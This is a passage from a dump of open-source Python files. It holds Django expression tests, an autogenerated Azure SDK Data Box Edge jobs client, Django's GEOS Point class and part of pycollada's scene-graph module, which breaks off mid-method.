Experiment.objects.filter(start__lt=F('assigned') + delay)]
self.assertEqual(test_set, self.expnames[:i])
test_set = [e.name for e in
Experiment.objects.filter(start__lte=F('assigned') + delay +
datetime.timedelta(1))]
self.assertEqual(test_set, self.expnames[:i + 1])
def test_delta_update(self):
for i in range(len(self.deltas)):
delta = self.deltas[i]
exps = Experiment.objects.all()
expected_durations = [e.duration() for e in exps]
expected_starts = [e.start + delta for e in exps]
expected_ends = [e.end + delta for e in exps]
Experiment.objects.update(start=F('start') + delta, end=F('end') + delta)
exps = Experiment.objects.all()
new_starts = [e.start for e in exps]
new_ends = [e.end for e in exps]
new_durations = [e.duration() for e in exps]
self.assertEqual(expected_starts, new_starts)
self.assertEqual(expected_ends, new_ends)
self.assertEqual(expected_durations, new_durations)
def test_invalid_operator(self):
with self.assertRaises(DatabaseError):
list(Experiment.objects.filter(start=F('start') * datetime.timedelta(0)))
def test_durationfield_add(self):
zeros = [e.name for e in
Experiment.objects.filter(start=F('start') + F('estimated_time'))]
self.assertEqual(zeros, ['e0'])
end_less = [e.name for e in
Experiment.objects.filter(end__lt=F('start') + F('estimated_time'))]
self.assertEqual(end_less, ['e2'])
delta_math = [e.name for e in
Experiment.objects.filter(end__gte=F('start') + F('estimated_time') + datetime.timedelta(hours=1))]
self.assertEqual(delta_math, ['e4'])
@skipUnlessDBFeature("has_native_duration_field")
def test_date_subtraction(self):
under_estimate = [e.name for e in
Experiment.objects.filter(estimated_time__gt=F('end') - F('start'))]
self.assertEqual(under_estimate, ['e2'])
over_estimate = [e.name for e in
Experiment.objects.filter(estimated_time__lt=F('end') - F('start'))]
self.assertEqual(over_estimate, ['e4'])
def test_duration_with_datetime(self):
# Exclude e1 which has very high precision so we can test this on all
# backends regardless of whether or not it supports
# microsecond_precision.
over_estimate = Experiment.objects.exclude(name='e1').filter(
completed__gt=self.stime + F('estimated_time'),
).order_by('name')
self.assertQuerysetEqual(over_estimate, ['e3', 'e4'], lambda e: e.name)
class ValueTests(TestCase):
def test_update_TimeField_using_Value(self):
Time.objects.create()
Time.objects.update(time=Value(datetime.time(1), output_field=TimeField()))
self.assertEqual(Time.objects.get().time, datetime.time(1))
def test_update_UUIDField_using_Value(self):
UUID.objects.create()
UUID.objects.update(uuid=Value(uuid.UUID('12345678901234567890123456789012'), output_field=UUIDField()))
self.assertEqual(UUID.objects.get().uuid, uuid.UUID('12345678901234567890123456789012'))
class ReprTests(TestCase):
def test_expressions(self):
self.assertEqual(
repr(Case(When(a=1))),
"<Case: CASE WHEN <Q: (AND: ('a', 1))> THEN Value(None), ELSE Value(None)>"
)
self.assertEqual(repr(Col('alias', 'field')), "Col(alias, field)")
self.assertEqual(repr(Date('published', 'exact')), "Date(published, exact)")
self.assertEqual(repr(DateTime('published', 'exact', utc)), "DateTime(published, exact, %s)" % utc)
self.assertEqual(repr(F('published')), "F(published)")
self.assertEqual(repr(F('cost') + F('tax')), "<CombinedExpression: F(cost) + F(tax)>")
self.assertEqual(
repr(ExpressionWrapper(F('cost') + F('tax'), models.IntegerField())),
"ExpressionWrapper(F(cost) + F(tax))"
)
self.assertEqual(repr(Func('published', function='TO_CHAR')), "Func(F(published), function=TO_CHAR)")
self.assertEqual(repr(OrderBy(Value(1))), 'OrderBy(Value(1), descending=False)')
self.assertEqual(repr(Random()), "Random()")
self.assertEqual(repr(RawSQL('table.col', [])), "RawSQL(table.col, [])")
self.assertEqual(repr(Ref('sum_cost', Sum('cost'))), "Ref(sum_cost, Sum(F(cost)))")
self.assertEqual(repr(Value(1)), "Value(1)")
def test_functions(self):
self.assertEqual(repr(Coalesce('a', 'b')), "Coalesce(F(a), F(b))")
self.assertEqual(repr(Concat('a', 'b')), "Concat(ConcatPair(F(a), F(b)))")
self.assertEqual(repr(Length('a')), "Length(F(a))")
self.assertEqual(repr(Lower('a')), "Lower(F(a))")
self.assertEqual(repr(Substr('a', 1, 3)), "Substr(F(a), Value(1), Value(3))")
self.assertEqual(repr(Upper('a')), "Upper(F(a))")
def test_aggregates(self):
self.assertEqual(repr(Avg('a')), "Avg(F(a))")
self.assertEqual(repr(Count('a')), "Count(F(a), distinct=False)")
self.assertEqual(repr(Max('a')), "Max(F(a))")
self.assertEqual(repr(Min('a')), "Min(F(a))")
self.assertEqual(repr(StdDev('a')), "StdDev(F(a), sample=False)")
self.assertEqual(repr(Sum('a')), "Sum(F(a))")
self.assertEqual(repr(Variance('a', sample=True)), "Variance(F(a), sample=True)")
|
bsd-3-clause
|
Azure/azure-sdk-for-python
|
sdk/databoxedge/azure-mgmt-databoxedge/azure/mgmt/databoxedge/v2019_08_01/operations/_jobs_operations.py
|
1
|
4882
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class JobsOperations(object):
"""JobsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.databoxedge.v2019_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def get(
self,
device_name, # type: str
name, # type: str
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.Job"
"""Gets the details of a specified job on a Data Box Edge/Data Box Gateway device.
Gets the details of a specified job on a Data Box Edge/Data Box Gateway device.
:param device_name: The device name.
:type device_name: str
:param name: The job name.
:type name: str
:param resource_group_name: The resource group name.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Job, or the result of cls(response)
:rtype: ~azure.mgmt.databoxedge.v2019_08_01.models.Job
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Job"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'deviceName': self._serialize.url("device_name", device_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Job', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/jobs/{name}'} # type: ignore
|
mit
|
lanbing510/GTDWeb
|
django/contrib/gis/geos/point.py
|
103
|
4401
|
from ctypes import c_uint
from django.contrib.gis.geos import prototypes as capi
from django.contrib.gis.geos.error import GEOSException
from django.contrib.gis.geos.geometry import GEOSGeometry
from django.utils import six
from django.utils.six.moves import range
class Point(GEOSGeometry):
_minlength = 2
_maxlength = 3
def __init__(self, x, y=None, z=None, srid=None):
"""
The Point object may be initialized with either a tuple, or individual
parameters.
For Example:
>>> p = Point((5, 23)) # 2D point, passed in as a tuple
>>> p = Point(5, 23, 8) # 3D point, passed in with individual parameters
"""
if isinstance(x, (tuple, list)):
# Here a tuple or list was passed in under the `x` parameter.
ndim = len(x)
coords = x
elif isinstance(x, six.integer_types + (float,)) and isinstance(y, six.integer_types + (float,)):
# Here X, Y, and (optionally) Z were passed in individually, as parameters.
if isinstance(z, six.integer_types + (float,)):
ndim = 3
coords = [x, y, z]
else:
ndim = 2
coords = [x, y]
else:
raise TypeError('Invalid parameters given for Point initialization.')
point = self._create_point(ndim, coords)
# Initializing using the address returned from the GEOS
# createPoint factory.
super(Point, self).__init__(point, srid=srid)
def _create_point(self, ndim, coords):
"""
Create a coordinate sequence, set X, Y, [Z], and create point
"""
if ndim < 2 or ndim > 3:
raise TypeError('Invalid point dimension: %s' % str(ndim))
cs = capi.create_cs(c_uint(1), c_uint(ndim))
i = iter(coords)
capi.cs_setx(cs, 0, next(i))
capi.cs_sety(cs, 0, next(i))
if ndim == 3:
capi.cs_setz(cs, 0, next(i))
return capi.create_point(cs)
def _set_list(self, length, items):
ptr = self._create_point(length, items)
if ptr:
capi.destroy_geom(self.ptr)
self._ptr = ptr
self._set_cs()
else:
# can this happen?
raise GEOSException('Geometry resulting from slice deletion was invalid.')
def _set_single(self, index, value):
self._cs.setOrdinate(index, 0, value)
def __iter__(self):
"Allows iteration over coordinates of this Point."
for i in range(len(self)):
yield self[i]
def __len__(self):
"Returns the number of dimensions for this Point (either 0, 2 or 3)."
if self.empty:
return 0
if self.hasz:
return 3
else:
return 2
def _get_single_external(self, index):
if index == 0:
return self.x
elif index == 1:
return self.y
elif index == 2:
return self.z
_get_single_internal = _get_single_external
def get_x(self):
"Returns the X component of the Point."
return self._cs.getOrdinate(0, 0)
def set_x(self, value):
"Sets the X component of the Point."
self._cs.setOrdinate(0, 0, value)
def get_y(self):
"Returns the Y component of the Point."
return self._cs.getOrdinate(1, 0)
def set_y(self, value):
"Sets the Y component of the Point."
self._cs.setOrdinate(1, 0, value)
def get_z(self):
"Returns the Z component of the Point."
if self.hasz:
return self._cs.getOrdinate(2, 0)
else:
return None
def set_z(self, value):
"Sets the Z component of the Point."
if self.hasz:
self._cs.setOrdinate(2, 0, value)
else:
raise GEOSException('Cannot set Z on 2D Point.')
# X, Y, Z properties
x = property(get_x, set_x)
y = property(get_y, set_y)
z = property(get_z, set_z)
# ### Tuple setting and retrieval routines. ###
def get_coords(self):
"Returns a tuple of the point."
return self._cs.tuple
def set_coords(self, tup):
"Sets the coordinates of the point with the given tuple."
self._cs[0] = tup
# The tuple and coords properties
tuple = property(get_coords, set_coords)
coords = tuple
|
gpl-2.0
|
Reepca/YAHRP
|
deps/collada/scene.py
|
2
|
36365
|
####################################################################
# #
# THIS FILE IS PART OF THE pycollada LIBRARY SOURCE CODE. #
# USE, DISTRIBUTION AND REPRODUCTION OF THIS LIBRARY SOURCE IS #
# GOVERNED BY A BSD-STYLE SOURCE LICENSE INCLUDED WITH THIS SOURCE #
# IN 'COPYING'. PLEASE READ THESE TERMS BEFORE DISTRIBUTING. #
# #
# THE pycollada SOURCE CODE IS (C) COPYRIGHT 2011 #
# by Jeff Terrace and contributors #
# #
####################################################################
"""This module contains several classes related to the scene graph.
Supported scene nodes are:
* <node> which is loaded as a Node
* <instance_camera> which is loaded as a CameraNode
* <instance_light> which is loaded as a LightNode
* <instance_material> which is loaded as a MaterialNode
* <instance_geometry> which is loaded as a GeometryNode
* <instance_controller> which is loaded as a ControllerNode
* <scene> which is loaded as a Scene
"""
import copy
import numpy
from collada.common import DaeObject, E, tag
from collada.common import DaeError, DaeIncompleteError, DaeBrokenRefError, \
DaeMalformedError, DaeUnsupportedError
from collada.util import toUnitVec
from collada.xmlutil import etree as ElementTree
class DaeInstanceNotLoadedError(Exception):
"""Raised when an instance_node refers to a node that isn't loaded yet. Will always be caught"""
def __init__(self, msg):
super(DaeInstanceNotLoadedError,self).__init__()
self.msg = msg
class SceneNode(DaeObject):
"""Abstract base class for all nodes within a scene."""
def objects(self, tipo, matrix=None):
"""Iterate through all objects under this node that match `tipo`.
The objects will be bound and transformed via the scene transformations.
:param str tipo:
A string for the desired object type. This can be one of 'geometry',
'camera', 'light', or 'controller'.
:param numpy.matrix matrix:
An optional transformation matrix
:rtype: generator that yields the type specified
"""
pass
def makeRotationMatrix(x, y, z, angle):
"""Build and return a transform 4x4 matrix to rotate `angle` radians
around (`x`,`y`,`z`) axis."""
c = numpy.cos(angle)
s = numpy.sin(angle)
t = (1-c)
return numpy.array([[t*x*x+c, t*x*y - s*z, t*x*z + s*y, 0],
[t*x*y+s*z, t*y*y + c, t*y*z - s*x, 0],
[t*x*z - s*y, t*y*z + s*x, t*z*z + c, 0],
[0, 0, 0, 1]],
dtype=numpy.float32 )
class Transform(DaeObject):
"""Base class for all transformation types"""
def save(self):
pass
class TranslateTransform(Transform):
"""Contains a translation transformation as defined in the collada <translate> tag."""
def __init__(self, x, y, z, xmlnode=None):
"""Creates a translation transformation
:param float x:
x coordinate
:param float y:
y coordinate
:param float z:
z coordinate
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.x = x
"""x coordinate"""
self.y = y
"""y coordinate"""
self.z = z
"""z coordinate"""
self.matrix = numpy.identity(4, dtype=numpy.float32)
"""The resulting transformation matrix. This will be a numpy.array of size 4x4."""
self.matrix[:3,3] = [ x, y, z ]
self.xmlnode = xmlnode
"""ElementTree representation of the transform."""
if xmlnode is None:
self.xmlnode = E.translate(' '.join([str(x),str(y),str(z)]))
@staticmethod
def load(collada, node):
floats = numpy.fromstring(node.text, dtype=numpy.float32, sep=' ')
if len(floats) != 3:
raise DaeMalformedError("Translate node requires three float values")
return TranslateTransform(floats[0], floats[1], floats[2], node)
def __str__(self):
return '<TranslateTransform (%s, %s, %s)>' % (self.x, self.y, self.z)
def __repr__(self):
return str(self)
class RotateTransform(Transform):
"""Contains a rotation transformation as defined in the collada <rotate> tag."""
def __init__(self, x, y, z, angle, xmlnode=None):
"""Creates a rotation transformation
:param float x:
x coordinate
:param float y:
y coordinate
:param float z:
z coordinate
:param float angle:
angle of rotation, in radians
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.x = x
"""x coordinate"""
self.y = y
"""y coordinate"""
self.z = z
"""z coordinate"""
self.angle = angle
"""angle of rotation, in radians"""
self.matrix = makeRotationMatrix(x, y, z, angle*numpy.pi/180.0)
"""The resulting transformation matrix. This will be a numpy.array of size 4x4."""
self.xmlnode = xmlnode
"""ElementTree representation of the transform."""
if xmlnode is None:
self.xmlnode = E.rotate(' '.join([str(x),str(y),str(z),str(angle)]))
@staticmethod
def load(collada, node):
floats = numpy.fromstring(node.text, dtype=numpy.float32, sep=' ')
if len(floats) != 4:
raise DaeMalformedError("Rotate node requires four float values")
return RotateTransform(floats[0], floats[1], floats[2], floats[3], node)
def __str__(self):
return '<RotateTransform (%s, %s, %s) angle=%s>' % (self.x, self.y, self.z, self.angle)
def __repr__(self):
return str(self)
class ScaleTransform(Transform):
"""Contains a scale transformation as defined in the collada <scale> tag."""
def __init__(self, x, y, z, xmlnode=None):
"""Creates a scale transformation
:param float x:
x coordinate
:param float y:
y coordinate
:param float z:
z coordinate
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.x = x
"""x coordinate"""
self.y = y
"""y coordinate"""
self.z = z
"""z coordinate"""
self.matrix = numpy.identity(4, dtype=numpy.float32)
"""The resulting transformation matrix. This will be a numpy.array of size 4x4."""
self.matrix[0,0] = x
self.matrix[1,1] = y
self.matrix[2,2] = z
self.xmlnode = xmlnode
"""ElementTree representation of the transform."""
if xmlnode is None:
self.xmlnode = E.scale(' '.join([str(x),str(y),str(z)]))
@staticmethod
def load(collada, node):
floats = numpy.fromstring(node.text, dtype=numpy.float32, sep=' ')
if len(floats) != 3:
raise DaeMalformedError("Scale node requires three float values")
return ScaleTransform(floats[0], floats[1], floats[2], node)
def __str__(self):
return '<ScaleTransform (%s, %s, %s)>' % (self.x, self.y, self.z)
def __repr__(self):
return str(self)
class MatrixTransform(Transform):
"""Contains a matrix transformation as defined in the collada <matrix> tag."""
def __init__(self, matrix, xmlnode=None):
"""Creates a matrix transformation
:param numpy.array matrix:
This should be an unshaped numpy array of floats of length 16
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.matrix = matrix
"""The resulting transformation matrix. This will be a numpy.array of size 4x4."""
if len(self.matrix) != 16: raise DaeMalformedError('Corrupted matrix transformation node')
self.matrix.shape = (4, 4)
self.xmlnode = xmlnode
"""ElementTree representation of the transform."""
if xmlnode is None:
self.xmlnode = E.matrix(' '.join(map(str, self.matrix.flat)))
@staticmethod
def load(collada, node):
floats = numpy.fromstring(node.text, dtype=numpy.float32, sep=' ')
return MatrixTransform(floats, node)
def __str__(self):
return '<MatrixTransform>'
def __repr__(self):
return str(self)
class LookAtTransform(Transform):
"""Contains a transformation for aiming a camera as defined in the collada <lookat> tag."""
def __init__(self, eye, interest, upvector, xmlnode=None):
"""Creates a lookat transformation
:param numpy.array eye:
An unshaped numpy array of floats of length 3 containing the position of the eye
:param numpy.array interest:
An unshaped numpy array of floats of length 3 containing the point of interest
:param numpy.array upvector:
An unshaped numpy array of floats of length 3 containing the up-axis direction
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.eye = eye
"""A numpy array of length 3 containing the position of the eye"""
self.interest = interest
"""A numpy array of length 3 containing the point of interest"""
self.upvector = upvector
"""A numpy array of length 3 containing the up-axis direction"""
if len(eye) != 3 or len(interest) != 3 or len(upvector) != 3:
raise DaeMalformedError('Corrupted lookat transformation node')
self.matrix = numpy.identity(4, dtype=numpy.float32)
"""The resulting transformation matrix. This will be a numpy.array of size 4x4."""
front = toUnitVec(numpy.subtract(eye,interest))
side = numpy.multiply(-1, toUnitVec(numpy.cross(front, upvector)))
self.matrix[0,0:3] = side
self.matrix[1,0:3] = upvector
self.matrix[2,0:3] = front
self.matrix[3,0:3] = eye
self.xmlnode = xmlnode
"""ElementTree representation of the transform."""
if xmlnode is None:
self.xmlnode = E.lookat(' '.join(map(str,
numpy.concatenate((self.eye, self.interest, self.upvector)) )))
@staticmethod
def load(collada, node):
floats = numpy.fromstring(node.text, dtype=numpy.float32, sep=' ')
if len(floats) != 9:
raise DaeMalformedError("Lookat node requires 9 float values")
return LookAtTransform(floats[0:3], floats[3:6], floats[6:9], node)
def __str__(self):
return '<LookAtTransform>'
def __repr__(self):
return str(self)
class Node(SceneNode):
"""Represents a node object, which is a point on the scene graph, as defined in the collada <node> tag.
Contains the list of transformations effecting the node as well as any children.
"""
def __init__(self, id, children=None, transforms=None, xmlnode=None):
"""Create a node in the scene graph.
:param str id:
A unique string identifier for the node
:param list children:
A list of child nodes of this node. This can contain any
object that inherits from :class:`collada.scene.SceneNode`
:param list transforms:
A list of transformations effecting the node. This can
contain any object that inherits from :class:`collada.scene.Transform`
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.id = id
"""The unique string identifier for the node"""
self.children = []
"""A list of child nodes of this node. This can contain any
object that inherits from :class:`collada.scene.SceneNode`"""
if children is not None:
self.children = children
self.transforms = []
if transforms is not None:
self.transforms = transforms
"""A list of transformations effecting the node. This can
contain any object that inherits from :class:`collada.scene.Transform`"""
self.matrix = numpy.identity(4, dtype=numpy.float32)
"""A numpy.array of size 4x4 containing a transformation matrix that
combines all the transformations in :attr:`transforms`. This will only
be updated after calling :meth:`save`."""
for t in self.transforms:
self.matrix = numpy.dot(self.matrix, t.matrix)
if xmlnode is not None:
self.xmlnode = xmlnode
"""ElementTree representation of the transform."""
else:
self.xmlnode = E.node(id=self.id, name=self.id)
for t in self.transforms:
self.xmlnode.append(t.xmlnode)
for c in self.children:
self.xmlnode.append(c.xmlnode)
def objects(self, tipo, matrix=None):
"""Iterate through all objects under this node that match `tipo`.
The objects will be bound and transformed via the scene transformations.
:param str tipo:
A string for the desired object type. This can be one of 'geometry',
'camera', 'light', or 'controller'.
:param numpy.matrix matrix:
An optional transformation matrix
:rtype: generator that yields the type specified
"""
if not matrix is None: M = numpy.dot( matrix, self.matrix )
else: M = self.matrix
for node in self.children:
for obj in node.objects(tipo, M):
yield obj
def save(self):
"""Saves the geometry back to :attr:`xmlnode`. Also updates
:attr:`matrix` if :attr:`transforms` has been modified."""
self.matrix = numpy.identity(4, dtype=numpy.float32)
for t in self.transforms:
self.matrix = numpy.dot(self.matrix, t.matrix)
for child in self.children:
child.save()
if self.id is not None:
self.xmlnode.set('id', self.id)
self.xmlnode.set('name', self.id)
for t in self.transforms:
if t.xmlnode not in self.xmlnode:
self.xmlnode.append(t.xmlnode)
for c in self.children:
if c.xmlnode not in self.xmlnode:
self.xmlnode.append(c.xmlnode)
xmlnodes = [c.xmlnode for c in self.children]
xmlnodes.extend([t.xmlnode for t in self.transforms])
for n in self.xmlnode:
if n not in xmlnodes:
self.xmlnode.remove(n)
@staticmethod
def load( collada, node, localscope ):
id = node.get('id')
children = []
transforms = []
for subnode in node:
try:
n = loadNode(collada, subnode, localscope)
if isinstance(n, Transform):
transforms.append(n)
elif n is not None:
children.append(n)
except DaeError as ex:
collada.handleError(ex)
return Node(id, children, transforms, xmlnode=node)
def __str__(self):
return '<Node transforms=%d, children=%d>' % (len(self.transforms), len(self.children))
def __repr__(self):
return str(self)
class NodeNode(Node):
"""Represents a node being instantiated in a scene, as defined in the collada <instande_node> tag."""
def __init__(self, node, xmlnode=None):
"""Creates a node node
:param collada.scene.Node node:
A node to instantiate in the scene
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.node = node
"""An object of type :class:`collada.scene.Node` representing the node to bind in the scene"""
if xmlnode != None:
self.xmlnode = xmlnode
"""ElementTree representation of the node node."""
else:
self.xmlnode = E.instance_node(url="#%s" % self.node.id)
def objects(self, tipo, matrix=None):
for obj in self.node.objects(tipo, matrix):
yield obj
id = property(lambda s: s.node.id)
children = property(lambda s: s.node.children)
matrix = property(lambda s: s.node.matrix)
@staticmethod
def load( collada, node, localscope ):
url = node.get('url')
if not url.startswith('#'):
raise DaeMalformedError('Invalid url in node instance %s' % url)
referred_node = localscope.get(url[1:])
if not referred_node:
referred_node = collada.nodes.get(url[1:])
if not referred_node:
raise DaeInstanceNotLoadedError('Node %s not found in library'%url)
return NodeNode(referred_node, xmlnode=node)
def save(self):
"""Saves the node node back to :attr:`xmlnode`"""
self.xmlnode.set('url', "#%s" % self.node.id)
def __str__(self):
return '<NodeNode node=%s>' % (self.node.id,)
def __repr__(self):
return str(self)
class GeometryNode(SceneNode):
"""Represents a geometry instance in a scene, as defined in the collada <instance_geometry> tag."""
def __init__(self, geometry, materials=None, xmlnode=None):
"""Creates a geometry node
:param collada.geometry.Geometry geometry:
A geometry to instantiate in the scene
:param list materials:
A list containing items of type :class:`collada.scene.MaterialNode`.
Each of these represents a material that the geometry should be
bound to.
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.geometry = geometry
"""An object of type :class:`collada.geometry.Geometry` representing the
geometry to bind in the scene"""
self.materials = []
"""A list containing items of type :class:`collada.scene.MaterialNode`.
Each of these represents a material that the geometry is bound to."""
if materials is not None:
self.materials = materials
if xmlnode != None:
self.xmlnode = xmlnode
"""ElementTree representation of the geometry node."""
else:
self.xmlnode = E.instance_geometry(url="#%s" % self.geometry.id)
if len(self.materials) > 0:
self.xmlnode.append(E.bind_material(
E.technique_common(
*[mat.xmlnode for mat in self.materials]
)
))
def objects(self, tipo, matrix=None):
"""Yields a :class:`collada.geometry.BoundGeometry` if ``tipo=='geometry'``"""
if tipo == 'geometry':
if matrix is None: matrix = numpy.identity(4, dtype=numpy.float32)
materialnodesbysymbol = {}
for mat in self.materials:
materialnodesbysymbol[mat.symbol] = mat
yield self.geometry.bind(matrix, materialnodesbysymbol)
@staticmethod
def load( collada, node ):
url = node.get('url')
if not url.startswith('#'): raise DaeMalformedError('Invalid url in geometry instance %s' % url)
geometry = collada.geometries.get(url[1:])
if not geometry: raise DaeBrokenRefError('Geometry %s not found in library'%url)
matnodes = node.findall('%s/%s/%s'%( tag('bind_material'), tag('technique_common'), tag('instance_material') ) )
materials = []
for matnode in matnodes:
materials.append( MaterialNode.load(collada, matnode) )
return GeometryNode( geometry, materials, xmlnode=node)
def save(self):
"""Saves the geometry node back to :attr:`xmlnode`"""
self.xmlnode.set('url', "#%s" % self.geometry.id)
for m in self.materials:
m.save()
matparent = self.xmlnode.find('%s/%s'%( tag('bind_material'), tag('technique_common') ) )
if matparent is None and len(self.materials)==0:
return
elif matparent is None:
matparent = E.technique_common()
self.xmlnode.append(E.bind_material(matparent))
elif len(self.materials) == 0 and matparent is not None:
bindnode = self.xmlnode.find('%s' % tag('bind_material'))
self.xmlnode.remove(bindnode)
return
for m in self.materials:
if m.xmlnode not in matparent:
matparent.append(m.xmlnode)
xmlnodes = [m.xmlnode for m in self.materials]
for n in matparent:
if n not in xmlnodes:
matparent.remove(n)
def __str__(self):
return '<GeometryNode geometry=%s>' % (self.geometry.id,)
def __repr__(self):
return str(self)
class ControllerNode(SceneNode):
"""Represents a controller instance in a scene, as defined in the collada <instance_controller> tag. **This class is highly
experimental. More support will be added in version 0.4.**"""
def __init__(self, controller, materials, xmlnode=None):
"""Creates a controller node
:param collada.controller.Controller controller:
A controller to instantiate in the scene
:param list materials:
A list containing items of type :class:`collada.scene.MaterialNode`.
Each of these represents a material that the controller should be
bound to.
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.controller = controller
""" An object of type :class:`collada.controller.Controller` representing
the controller being instantiated in the scene"""
self.materials = materials
"""A list containing items of type :class:`collada.scene.MaterialNode`.
Each of these represents a material that the controller is bound to."""
if xmlnode != None:
self.xmlnode = xmlnode
"""ElementTree representation of the controller node."""
else:
self.xmlnode = ElementTree.Element( tag('instance_controller') )
bindnode = ElementTree.Element( tag('bind_material') )
technode = ElementTree.Element( tag('technique_common') )
bindnode.append( technode )
self.xmlnode.append( bindnode )
for mat in materials: technode.append( mat.xmlnode )
def objects(self, tipo, matrix=None):
"""Yields a :class:`collada.controller.BoundController` if ``tipo=='controller'``"""
if tipo == 'controller':
if matrix is None: matrix = numpy.identity(4, dtype=numpy.float32)
materialnodesbysymbol = {}
for mat in self.materials:
materialnodesbysymbol[mat.symbol] = mat
yield self.controller.bind(matrix, materialnodesbysymbol)
@staticmethod
def load( collada, node ):
url = node.get('url')
if not url.startswith('#'): raise DaeMalformedError('Invalid url in controller instance %s' % url)
controller = collada.controllers.get(url[1:])
if not controller: raise DaeBrokenRefError('Controller %s not found in library'%url)
matnodes = node.findall('%s/%s/%s'%( tag('bind_material'), tag('technique_common'), tag('instance_material') ) )
materials = []
for matnode in matnodes:
materials.append( MaterialNode.load(collada, matnode) )
return ControllerNode( controller, materials, xmlnode=node)
def save(self):
"""Saves the controller node back to :attr:`xmlnode`"""
self.xmlnode.set('url', '#'+self.controller.id)
for mat in self.materials:
mat.save()
def __str__(self):
return '<ControllerNode controller=%s>' % (self.controller.id,)
def __repr__(self):
return str(self)
class MaterialNode(SceneNode):
"""Represents a material being instantiated in a scene, as defined in the collada <instance_material> tag."""
def __init__(self, symbol, target, inputs, xmlnode = None):
"""Creates a material node
:param str symbol:
The symbol within a geometry this material should be bound to
:param collada.material.Material target:
The material object being bound to
:param list inputs:
A list of tuples of the form ``(semantic, input_semantic, set)`` mapping
texcoords or other inputs to material input channels, e.g.
``('TEX0', 'TEXCOORD', '0')`` would map the effect parameter ``'TEX0'``
to the ``'TEXCOORD'`` semantic of the geometry, using texture coordinate
set ``0``.
:param xmlnode:
When loaded, the xmlnode it comes from
"""
self.symbol = symbol
"""The symbol within a geometry this material should be bound to"""
self.target = target
"""An object of type :class:`collada.material.Material` representing the material object being bound to"""
self.inputs = inputs
"""A list of tuples of the form ``(semantic, input_semantic, set)`` mapping
texcoords or other inputs to material input channels, e.g.
``('TEX0', 'TEXCOORD', '0')`` would map the effect parameter ``'TEX0'``
to the ``'TEXCOORD'`` semantic of the geometry, using texture coordinate
set ``0``."""
if xmlnode is not None:
self.xmlnode = xmlnode
"""ElementTree representation of the material node."""
else:
self.xmlnode = E.instance_material(
*[E.bind_vertex_input(semantic=sem, input_semantic=input_sem, input_set=set)
for sem, input_sem, set in self.inputs]
, **{'symbol': self.symbol, 'target':"#%s"%self.target.id} )
@staticmethod
def load(collada, node):
inputs = []
for inputnode in node.findall( tag('bind_vertex_input') ):
inputs.append( ( inputnode.get('semantic'), inputnode.get('input_semantic'), inputnode.get('input_set') ) )
targetid = node.get('target')
if not targetid.startswith('#'): raise DaeMalformedError('Incorrect target id in material '+targetid)
target = collada.materials.get(targetid[1:])
if not target: raise DaeBrokenRefError('Material %s not found'%targetid)
return MaterialNode(node.get('symbol'), target, inputs, xmlnode = node)
def objects(self):
pass
def save(self):
"""Saves the material node back to :attr:`xmlnode`"""
self.xmlnode.set('symbol', self.symbol)
self.xmlnode.set('target', "#%s"%self.target.id)
inputs_in = []
for i in self.xmlnode.findall( tag('bind_vertex_input') ):
input_tuple = ( i.get('semantic'), i.get('input_semantic'), i.get('input_set') )
if input_tuple not in self.inputs:
self.xmlnode.remove(i)
else:
inputs_in.append(input_tuple)
for i in self.inputs:
if i not in inputs_in:
